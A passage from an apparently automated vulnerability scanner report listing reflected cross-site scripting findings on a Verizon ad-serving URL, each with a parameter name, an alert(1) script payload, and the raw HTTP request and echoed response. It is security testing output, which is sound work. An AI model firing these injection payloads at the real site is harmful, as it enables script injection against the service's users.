Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=f56b2"><script>alert(1)</script>793da9e8592&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.502. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [msp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the msp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f95d"><script>alert(1)</script>503cd138cd4 was submitted in the msp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=2f95d"><script>alert(1)</script>503cd138cd4&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=2f95d"><script>alert(1)</script>503cd138cd4&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.503. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11d1f"><script>alert(1)</script>fd242333ffd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&11d1f"><script>alert(1)</script>fd242333ffd=1 HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:29:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1400
Content-Type: text/html
Cache-Control: private
Content-Length: 1400

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
rtner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&11d1f"><script>alert(1)</script>fd242333ffd=1" target="_top">
...[SNIP]...

2.504. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [npa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2dec"><script>alert(1)</script>c25abd409ae was submitted in the npa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=f2dec"><script>alert(1)</script>c25abd409ae&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
g/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=f2dec"><script>alert(1)</script>c25abd409ae&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.505. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [nxx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c01"><script>alert(1)</script>462b8bdf0db was submitted in the nxx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=f3c01"><script>alert(1)</script>462b8bdf0db&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=f3c01"><script>alert(1)</script>462b8bdf0db&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.506. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [online_backup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61d02"><script>alert(1)</script>96210eab7f4 was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=61d02"><script>alert(1)</script>96210eab7f4&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ty=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=61d02"><script>alert(1)</script>96210eab7f4&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.507. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71248"><script>alert(1)</script>912101f20d8 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=71248"><script>alert(1)</script>912101f20d8&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:28:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=71248"><script>alert(1)</script>912101f20d8&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" targe
...[SNIP]...

2.508. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popcity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12983"><script>alert(1)</script>fa347602d9 was submitted in the popcity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=12983"><script>alert(1)</script>fa347602d9&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:27:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
lick_lx.ads/vzsurround2.net/homepage/L24/240541143/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=12983"><script>alert(1)</script>fa347602d9&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&au
...[SNIP]...

2.509. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popcounty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c4f"><script>alert(1)</script>9292d8debf9 was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=31c4f"><script>alert(1)</script>9292d8debf9&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:27:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1396
Content-Type: text/html
Cache-Control: private
Content-Length: 1396

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ge/L24/2047031690/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=31c4f"><script>alert(1)</script>9292d8debf9&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email
...[SNIP]...

2.510. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popdma parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa86d"><script>alert(1)</script>415a215ed32 was submitted in the popdma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=fa86d"><script>alert(1)</script>415a215ed32&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:27:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1394
Content-Type: text/html
Cache-Control: private
Content-Length: 1394

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
397753549/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=fa86d"><script>alert(1)</script>415a215ed32&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhos
...[SNIP]...

2.511. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top [popindicator parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top

Issue detail

The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5c6"><script>alert(1)</script>4b709a88f58 was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/5957@Top?popip=174.122.23.218&popindicator=ce5c6"><script>alert(1)</script>4b709a88f58&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout26041
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:27:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1392
Content-Type: text/html
Cache-Control: private
Content-Length: 1392

<script type='text/javascript'>
